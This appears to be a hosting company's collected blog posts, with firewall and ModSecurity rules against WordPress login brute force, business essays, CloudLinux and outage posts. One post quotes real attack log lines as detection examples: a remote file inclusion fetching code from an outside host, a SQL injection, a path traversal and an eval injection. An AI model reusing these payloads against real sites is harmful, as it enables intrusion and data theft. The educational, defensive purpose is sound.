All our forward facing servers were patched and TLS1.0 disabled as per PCI compliance guidelines.

As always you can put your Trust in DNI to provide you fast response to your PCI Compliancy issues.

After our vendors released OS patches we patched all servers immediately after. This includes all clients on our bi monthly patching service.

What is glibc?

The glibc library is a core part of the Linux operating system based on the standard C library. This is a critical library and without it Linux will not function.

If you would like to learn about the details of this vulnerability please visit https://community.qualys.com/blogs

On csf and apf firewalls add to the /etc/csf/csfpre.sh or /etc/apf/preroute.rules

#Attack on wordpress:

/sbin/iptables -I INPUT -p tcp –dport 80 -m string –string “Log+In&testcookie=1” –algo kmp -j DROP

Add this to your modsecurity2 rules:

<LocationMatch “/wp-login.php”>
SecAction initcol:ip=%{REMOTE_ADDR},pass,nolog,id:313371
SecAction “phase:5,deprecatevar:ip.counter=2/30,pass,nolog,id:313372”
SecRule IP:COUNTER “@gt 1” “phase:2,pause:300,deny,status:406,setenv:RATELIMITED,skip:1,nolog,id:313373”
SecAction “phase:2,pass,setvar:ip.counter=+1,nolog,id:313374”
</LocationMatch>

And if all else fails you can block all wp-login.php in the main apache config :

<Files wp-login.php>
order deny,allow
Deny from all
</Files>

or chmod 000 all wp-login.php files:

For clients wanting to secure their wordpress login edit your .htaccess in your ftp folder and add the below with the ipaddress that need to connect to your wordpress login:

<Files wp-login.php>
deny from all
allow from xxx.xxx.xxx.xxx
</Files>

#note this command is for Hsphere clusters change the path to where your web files are located.

find /hsphere/local/home -type f -name ‘wp-login.php’ -print0 | xargs -0 chmod 000

If you have any further questions please dont hestitate to contact us.

I lost track of how many times I’ve heard that phrase or variations like it to justify business decisions whether it be employer vs. employee or business vs. customer.

If your focus is building and maintaining relationships, the “vs” should always be a red flag. If your focus is on the dollar, then you might miss the “vs.” part of the equation.

How many of you have heard the phrase, penny wise and dollar foolish?

May I propose to you that if you believe “This is business, not personal” when it comes to any relationship, you are losing more dollars than if you treat every issue as being very personal?

How much longer do relationships survive if you treat each one with loving care? That each decision and action are personal to the recipient; and, their feelings always matter.

What’s the life time value of your customers? Do you want that life blood to be extended for as long as possible? Then consider making it very personal in the right ways.

What are your thoughts? Please share them in the comment area below.

The next time I get a phone call to go over hacker clean up, server hardening, server administration where the prospective customer is more concerned over the $100.00 per hour rate than the problem costing them customers and potentially their business, I hope remember to share with them this article.

Imagine reading Service Suspension – Ongoing unanswered abuse complaints thinking to yourself, the person is in a jamb…. I hope they get someone who can really help them (maybe we could, not sure), then later on reading the person who initiated the post also runs a “All you can Eat” (i.e. unlimited support tickets, unlimited labor time) server administration business where they advertise a long list of what they can do for you for just $15.00 per month. I guess, they are so packed with work they could not solve their own problems.

Imagine, for just $15.00 per month you “24/7/365 USA-Based Technical Support” plus “24/7/365 Server Monitoring (5 Minute Intervals)” of your servers plus “Guaranteed 15 Minute Response On Monitoring Alerts” and so much more… sounds like a great deal? Right?

Now, I’m sure if you did a study of people who have heard and even believe in the quote, “you get what you pay for,” or variations of it, the percentage would be high.

Yet, how many actually do their homework to determine if something is really to good to be true?

For example, would you know right away that $15.00 per month for 24×7 coverage 365 days per year with a guaranteed response time of 15-minutes and unlimited administrator work (i.e. unlimited hours of work per month) was a deal too good to be true?

What if they removed the word, “unlimited,” and only included one hour per month? Would it then be more realistic?

In order to answer that question, what’s the going hourly rate for a server administrator? For a security administrator?

In the United States, for a server administrator, the going hourly rate ranges from $30.00 per hour to $52.00 per hour; for security administrators, the hourly rate ranges from $38.00 per hour to $56.00 per hour. In both cases, that doesn’t include benefits.

If a company is saying you get just even one hour for $15.00 when the going rate for an experienced party is $30.00 to $38.00 at a minimum….. get the picture?

You might get marketing speak that the employees multi-task and can work on many tasks at the same time… but isn’t that like someone who worked 2,000 real hours putting down 6,000 billable hours?

What are your thoughts on this subject? Did you purchase time thinking the rate was good or even average only to find out you were taken in by a “too good to be true” event? Let us know your thoughts below.

if you could imagine a refrigerator whose contents were a complete mess or even a room that was an organizational disaster, then open the door, throw in a magic ball of yarn, close the door, and then open the door again… only to be amazed about how well everything is organized and clutter free, you would get a visual of the what CloudLinux allows you to do on the server level.

If you’ve read previous articles I’ve written, you may get the hint I like dancing, and dancing like concepts such as when I wrote a two part series dealing with The Security Dance (part 1), and Taking Charge of the Security Dance (part 2).

CloudLinux is the same as you have two primary dance partners — visitors to Web sites hosted on servers running CloudLinux, and the hosting provider making use of CloudLinux.

Hosting providers who set up and use CloudLinux, when push comes to shove, have two choices for how they will use CloudLinux as part of their hosting infrastructure:

1. As a means to provide an extremely stable and reliable environment where CloudLinux will only trigger if there is outright malicious abuse.
2. As a means to cram as many web sites onto the server to achieve what is called in the industry, site / server density, as possible. In this area, CloudLinux can increase the capacity of a server anywhere from two to ten fold.

The visitor perspective on these two choices come down to what I’ll refer to as “light handed throttling” where the touch is so light real visitors with zero malicious intent will not know the server is being monitored in real time; and, “heavy handed throttling” where visitors may see growing delays in browsing through pages, be told the site is under maintenance (when it is not), or get a variety of errors ranging from time outs to internal server errors 403 and 500.

I’ve written about the impact of heavy handed throttling in an article titled, Does cheap web hosting lead to lost revenue?

Yet, just as CloudLinux can be used by cheap hosting providers to focus on continuing to be cheap, CloudLinux can also be used by value hosting providers to increase the stability of their environment.

Picture a small business steward who wants to learn rock climbing in an area known for dangerous birds to swoop in and potentially startle the new climber causing them to fall. Now imagine an environment where they still have the ambiance and yet no worries as such malicious activity is kept at bay.

That’s the focus we take with utilizing CloudLinux on our fully managed shared hosting servers. Light handed throttling that valid visitors never see, feel, or sense; and only coming out when a malicious bird would want to swoop in to cause someone to fall or stumble.

As a visitor to Web sites which would you prefer? The hosting provider who is using heavy handed throttling so they can cram as many sites onto a server as possible so they can justify very low prices? Or the high value provider who always wants the visitor to have a fast, reliable experience? Let us know in the comments below.

Please contact us if you have an interest in either using CloudLinux on servers you host through SoftLayer or other data centers, or about becoming one of our satisfied small to medium business customers.

I.e. If I’m not blogging or otherwise updating content, why would I have to log into WordPress on any regular basis?

Let me share with you some reasons as to why you should be logging into your WordPress content management system — CMS — or blog as often during the week as you are able to practically do so.

1. First and foremost, if you use a backup plugin, is it working? How would you know?
2. Secondly, are there any updates available for your plugins, themes, or WordPress itself?
3. Are there any other notifications for which you need to take some action?

For backup, I strongly recommend BackWPUp. It connects with the Dashboard so that when you login, you can see a recent list of successful as well as any unsuccessful backups.

If you have backup covered, in my experience you still want to check on a regular basis for updates.

Now, if you have WordFence or a similar plugin installed, you will get email notifications of updates. Outside of such notifications, logging into WordPress will allow you to see if there are updates available.

If there are updates available, I do encourage you to read the change log first prior to applying the update; and, to backup (including the database) prior to any update.

Here’s why. We use Relevanssi as a replacement to the WordPress search function; it had a recent update. If I would have just upgraded, I would have missed the important instructions in the change log telling me to deactivate and then reactivate the plugin after the update to apply important WordPress database changes the plugin needed to make.

What are your thoughts for how often the steward / manager of a WordPress site should log in as an administrative user?

Comment and let us know.

Just after ceremony of our daughter’s graduation from culinary school, I was paged with the message the Internet connectivity was down to the facility.

I was able to verify the loss of Internet connectivity as we drove home; and then it became the dance between getting updates from the co-location facility in Lancaster, PA and providing updates to our customers.

This was the very first major outage the co-location facility has had in years; and, the very first outage that we experience since becoming their customer a little over two years ago.

The outage started shortly after 5:00 PM Eastern Time, and as it started to head past 11:00 PM, we had were faced with the following issues:

1. Off site backups would fail (as the backup server in Lancaster, PA could not reach out to the servers for which backup is scheduled).
2. Email to our customers that go through the anti-spam appliance would bounce.

Thank Jesus, we did have a Plan B for the mail appliance.

We would redirect the MX (mail exchange) record to point directly to our mail servers rather than the anti-spam appliance. While there would be an increase in spam delivered, at least mail delivery would have minimal impact.

While we did wait as long as possible to see if we had to implement plan b, we ended up doing so shortly before 3 AM Eastern Time.

Thankfully, connectivity with the local co-location facility was restored around noon time the next day; and we were able to shift gears back to the anti-spam appliance… and we only lost one day of not backing up.

While we had Plan B planned out, we got to experience the hick ups (oh, we forgot about customer abc that routes to a different mail server); and we updated our documentation if Plan B is ever needed again.

Please share yours in the comment section below.

That’s right, everyone is a potential target — not just the big names, not just the rich companies, etc.

Now, web-based hack attempts come in many forms ranging from brute force to SQL injections.

Here’s a list of the common types including links to their definitions:

• Brute Force Attack
• Cross Site Scripting Attack
• Directory Traversal Attack
• Local file inclusion
• Remote file inclusion
• SQL Injection attack

I would like to share with you what each of the above types looks like from a log file or security report perspective.

The following comes from our proactive security monitoring service as well the reports we receive from our global security service.

I’m going to start off with the most common type we see which is remote file inclusion:

184.107.145.18 - - [06/Sep/2012:01:13:27 -0400] "GET /packages//wp-content/themes/metamorphosis/functions/thumb.php?src=http://www.blogger.com.moulinsaeau-41.org/cache.php HTTP/1.1" 404 3612 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2)

The above is timthumb attack where the attacker believes the Metamorphosis theme for WordPress if vulnerable; and they are trying to include the code from http://www.blogger.com.moulinsaeau-41.org/cache.php through the potential vulnerability.

The next type is an SQL injection attack:

84.235.73.226 - - [09/Sep/2012:01:16:03 +0100] "GET /merchandise.php?id=-999.9%20UNION%20ALL%20SELECT%20(SELECT%20distinct%20concat(0x7e,0x27,Hex(cast(table_name%20as%20char)),0x27,0x7e)%20FROM%20information_schema.tables%20Where%20table_schema=0x6A6F686E73746F6E5F6965%20limit%200,1),2,3,4,5-- HTTP/1.1" 500 3506 "-" "-" UEvfw1Qz7pgAAGfUdE0 "-"

The next is a directory traversal attack:

195.157.13.221 - - [05/Sep/2012:21:28:20 +0100] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../..//etc/amportal.conf%00 HTTP/1.1" 500 3506 "-" "-" UEe15FQz7pAAABD2KuM "-"

What follows is an example of a local file inclusion:

190.90.209.251 - - [05/Sep/2012:18:13:46 +0100] "GET /phpMyAdmin//config/config.inc.php?eval=echo%20md5(123); HTTP/1.1" 500 3506 "-" "-" UEeISlWFNc8AABl2Nvw "-"

Below are two examples of brute force — one for SSH, the other for email:

sshd[21192]: Invalid user deploy from 64.185.229.239
vpopmail[7134]: vchkpw-pop3: vpopmail user not found webmaster@:88.43.116.246

Do you review your hosting log files on a regular basis to see what attacks are getting through or being blocked?

Is your provider doing this for you?

Please let us know your questions and thoughts in the comments below.

I really appreciate being on both ends of giving and receiving as each encounter is an opportunity to learn, to adapt, to change, and to improve.

Part of that picture is hearing and seeing something you know makes sense and is true, and then growing into it (i.e. I know, I know… but don’t do… then ah ha… put it in action, silly).

One of the customer service 101 lessons involves being technically correct, but presenting the situation in a way that devalues the relationship.

In every relationship, you have choices. You can chose to always be right (i.e. technically correct), or you can choose to be in a relationship. If you value long term relationships like me, you will do your best to focus on the relationship rather than who is right and how often.

Every encounter you have with your customers, your employees, your partners is an opportunity for you to establish (or re-establish) relationship values or diminish them. The more they are diminished, the more likely the relationship will end.

Let me give you two examples. First is on the giving end, the second on the receiving end.

A customer puts in a support ticket about Spam Assassin incorrectly tagging valid email as being suspected as spam. In the email, the customer also complains about higher than normal real spam getting through.

A technically correct response might go into explaining Spam Assassins scoring mechanism, about white listing and how white listing only lowers the chance about tagging, etc. as well as just telling the customer to forward the actual spam that got through to the anti-spam appliance engineers.

A customer relationship response is to call the customer on the phone to go over the Spam Assassin settings, ask if it is ok to outright disable Spam Assassin (duplication of anti-spam — and in the particular case only tagging incorrectly), as well as go over the differences between the anti-spam appliance and Spam Assassin, the benefit of training the system. Plus empathizing with the customer for the spam that does get through by both disliking spam as well as sharing no system is perfect including our own anti-spam system.

The phone call also allowed a check in on an upcoming trip the client is looking forward to taking along with making sure the customer understands how much they are valued as a customer.

On the receiving end, I tend to perform backups more than the average person knowing the value of having a recent backup over an old backup or no backup at all. Some of the backups I take cover plan B and plan C for data recovery (do you have multiple plans for recover in case your primary plan doesn’t work as intended?).

One of the backup methods started failing, and I opened a ticket with the data center whose private network I was using to do the backup to see if they could help.

All of the initial responses were technically correct. Yet, all of them ended with, if you don’t respond within four days, the ticket will close. The problem still existed. I persisted and literally asked for a hero to step up to the plate (I’m sharing this because my personal feelings is that not all customers will be patient and ask for a hero when there appears to be no hero; they may just move on). The partner did step it up several notches, and moved from being technically correct to providing alternatives, in depth responses as well as viable alternatives and a phone call.

They were also open to passing along to the entire team about the differences between being right (technically correct) and being right plus promoting the relationship.

Please consider the following thoughts:

• You are in various relationships between family, friends, work, et al.
• Those relationships do matter.
• Does it matter who is right how often or does it matter more to have a long lasting relationship?
• As you respond to parties in your relationship is your focus about keeping and improving the relationship because the other party matters?
• What can you do daily to step up to the plate and be a hero?

What are your thoughts? Please share in the comments below.